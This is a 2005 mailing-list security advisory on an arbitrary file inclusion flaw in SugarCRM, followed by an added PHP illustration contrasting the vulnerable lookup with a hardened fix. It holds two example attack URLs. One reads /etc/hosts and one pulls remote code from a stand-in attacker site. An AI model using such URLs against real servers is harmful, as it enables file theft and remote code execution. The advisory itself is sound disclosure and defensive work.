Full Disclosure mailing list archives
Arbitrary file inclusion in SugarCRM [PHP]
From: Santiago Cortes <blindot () gmail com>
Date: Thu, 6 Jan 2005 16:46:41 -0500
------------------------------------------------------------
Arbitrary File Inclusion in SugarCRM
------------------------------------------------------------
Author: Santiago Cortés
Date: Jan 06, 2005
------------------------------------------------------------

Vulnerability:
Failure to sanitize user input in index.php allows an attacker to include an arbitrary local or remote file when PHP's "register_globals" is on.

Example:
http://www.sugarsales.com/index.php?module=Home&moduleDefaultFile[Home]=/etc/hosts
http://www.sugarsales.com/index.php?module=Home&moduleDefaultFile[Home]=http://www.attackersite.com/malicious.php

Fix:
Disable register_globals in your php.ini file, or replace line 198 in index.php:

    $currentModuleFile = $moduleDefaultFile[$currentModule];

with

    if ( !isset($moduleDefaultFile[$currentModule]) ) {
        die('No action specified');
    }
    $currentModuleFile = $moduleDefaultFile[$currentModule];

Disclaimer:
The information in this advisory and any of its demonstrations is provided "as is" without any warranty of any kind. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.

Contact:
Santiago Cortés
blindot --at-- gmail

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
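The following is an added illustration, not SugarCRM's code or the advisory author's: a cut-down model of the index.php dispatch described above, run against a constructed request. It simulates register_globals with extract() and places the request-controlled lookup beside a hardened version in which the module table is owned by the application and the module name is validated against it; the table contents and function names are assumptions.

```php
<?php
// Constructed request, standing in for
// ?module=Home&moduleDefaultFile[Home]=/etc/hosts
$get = array(
    'module'            => 'Home',
    'moduleDefaultFile' => array('Home' => '/etc/hosts'),
);

// --- Vulnerable pattern ---------------------------------------------------
// register_globals=On turns every request parameter, arrays included, into a
// global variable before the script runs. extract() reproduces that here.
function vulnerable_target(array $get)
{
    extract($get);                  // $module and $moduleDefaultFile now exist
    $currentModule     = $module;
    // The lookup from line 198 of the advisory: the array index is attacker
    // supplied, so the resulting path is too.
    $currentModuleFile = $moduleDefaultFile[$currentModule];
    return $currentModuleFile;      // the application would include() this
}

// --- Hardened pattern -----------------------------------------------------
// The module table is defined by the application and never read from the
// request; the module name is checked against that table before any use.
function hardened_target(array $get)
{
    $moduleDefaultFile = array(     // application-owned table (assumed entries)
        'Home'     => 'modules/Home/index.php',
        'Contacts' => 'modules/Contacts/index.php',
    );
    // Cast to string so an array-typed ?module[] parameter cannot reach isset().
    $currentModule = isset($get['module']) ? (string) $get['module'] : '';
    if (!isset($moduleDefaultFile[$currentModule])) {
        die('No action specified');
    }
    return $moduleDefaultFile[$currentModule];
}

echo "vulnerable: ", vulnerable_target($get), "\n";
echo "hardened:   ", hardened_target($get), "\n";
```

Run with the PHP CLI: the first line echoes the attacker-chosen path, the second the application's own file for the Home module, regardless of what the request carried in moduleDefaultFile.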